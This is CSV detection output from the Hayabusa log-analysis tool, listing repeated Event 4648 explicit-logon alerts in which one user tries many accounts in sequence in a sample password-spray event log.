2019-05-01 04:27:23.295 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: smisenar | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:27:24.342 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: jleytevidal | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:27:25.404 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: lpesce | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:27:26.504 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: sanson | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:27:27.583 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: sarmstrong | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:27:28.654 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: wstrzelec | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:27:29.712 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: zmathis | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:27:30.787 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: melliott | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:27:31.861 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: kperryman | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:27:32.955 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: jorchilles | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:27:34.020 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: jlake | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:27:35.081 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: edygert | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:27:36.151 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: drook | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:27:37.238 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: dmashburn | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:27:38.310 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: cspizor | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:27:39.393 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: cragoso | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:27:40.457 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: bgalbraith | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:27:41.553 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: bking | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:27:42.613 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: mdouglas | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:27:43.686 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: bgreenwood | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:27:44.738 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: baker | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:27:45.818 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: ssims | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:27:46.896 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: smisenar | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:27:47.953 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: Administrator | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:27:49.019 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: jwright | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:27:50.082 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: dpendolino | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:27:51.156 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: celgee | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:27:52.214 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: thessman | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:27:53.285 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: eskoudis | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:27:54.354 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: cdavis | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:27:55.438 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: mtoussain | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:27:56.513 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: lschifano | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:27:57.578 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: bhostetler | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:27:58.661 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: rbowes | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:27:59.721 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: ebooth | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:28:00.795 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: cfleener | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:28:01.865 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: cmoody | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:28:02.941 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: psmith | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:28:04.015 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: jkulikowski | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:28:05.097 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: gsalinas | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:28:06.182 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: tbennett | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:28:07.239 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: econrad | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:28:08.315 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: smisenar | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:28:09.399 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: jleytevidal | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:28:10.468 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: lpesce | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:28:11.549 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: sanson | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:28:12.621 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: sarmstrong | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:28:13.709 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: wstrzelec | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:28:14.769 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: zmathis | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:28:15.849 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: melliott | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:28:16.918 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: kperryman | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:28:17.999 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: jorchilles | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:28:19.068 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: jlake | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:28:20.129 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: edygert | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:28:21.201 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: drook | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:28:22.250 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: dmashburn | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:28:23.338 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: cspizor | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:28:24.404 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: cragoso | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:28:25.468 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: bgalbraith | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:28:26.529 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: bking | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:28:27.607 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: mdouglas | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:28:28.691 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: bgreenwood | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:28:29.753 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: baker | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:28:30.838 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: ssims | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:28:31.910 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: smisenar | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:28:32.983 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: Administrator | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:28:34.067 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: jwright | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:28:35.146 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: dpendolino | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:28:36.239 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: celgee | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:28:37.334 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: thessman | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:28:38.403 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: eskoudis | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:28:39.463 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: cdavis | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:28:40.530 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: mtoussain | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:28:41.608 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: lschifano | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:28:42.669 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: bhostetler | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:28:43.731 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: rbowes | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:28:44.801 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: ebooth | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:28:45.880 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: cfleener | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:28:46.969 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: cmoody | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:28:48.042 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: psmith | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:28:49.108 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: jkulikowski | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
